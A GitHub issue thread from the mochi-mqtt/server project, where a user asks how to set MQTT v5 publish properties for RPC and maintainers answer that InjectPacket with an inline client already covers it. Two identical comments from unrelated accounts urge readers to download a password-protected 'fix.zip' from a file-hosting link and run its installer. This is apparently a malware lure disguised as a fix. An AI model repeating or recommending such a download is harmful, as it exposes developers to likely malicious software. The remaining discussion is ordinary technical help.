### ISSUE TITLE
RPC with inline client

### ISSUE THREAD

**Issue by vitalvas** [mochi-mqtt/server#428]
Hello,

I'm trying to use a library to implement RPC (client-server architecture, mqtt is used as a transport instead of http).
I encountered the following problem - the "server.Publish" function does not have the ability to set `Properties`.

An example of what I need with `paho.golang`:

```go
requestID := uuid.New().String()

publish := &paho.Publish{
  Topic: "agent/myagent/request",
  Payload: []byte("{'name':'test'}"),
  Properties: &paho.PublishProperties{
    ContentType: "application/json",
    CorrelationData: []byte(requestID),
    ResponseTopic: fmt.Sprintf("agent/myagent/response/%s", requestID),
  },
}
```

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by thedevop** [comment]
You can use server.InjectPacket to have full control over the packet properties. In fact, server.Publish just creates the packet and calls InjectPacket.
https://github.com/mochi-mqtt/server/blob/830de149dc0387131a2af260e0e72a0ac13f7832/server.go#L753-L768

**Comment by vitalvas** [comment]
Yes, but `s.inlineClient` is a private variable. I don't want to implement a custom client for this.

Maybe add a new publish function like it is implemented in `paho.golang`?

**Comment by thedevop** [comment]
You do not need to use that inlineClient to publish. In fact, prior to introduction of inlineClient for subscription, a new inlineClient is created for every call to Publish.
```go
	cl := b.NewClient(nil, "local", "inline", true)

	return s.InjectPacket(cl, packets.Packet{
```

**Comment by TheCount** [comment]
@vitalvas Given @thedevop's explanation, I don't think we need a `PublishV2`. However, some additional documentation or even an example might be helpful. Along the lines:
* `Publish` is a convenience function, use `InjectPacket` for more complex stuff … (this is actually already in the docs),
* `NewClient` accepts `nil` connections for inline clients …
* `InjectPackage` accepts inline clients, see `[NewClient]` …

**Comment by thedevop** [comment]
Close this since current capability meets the requirement. Feel free to submit a PR to improve the documentation/example.
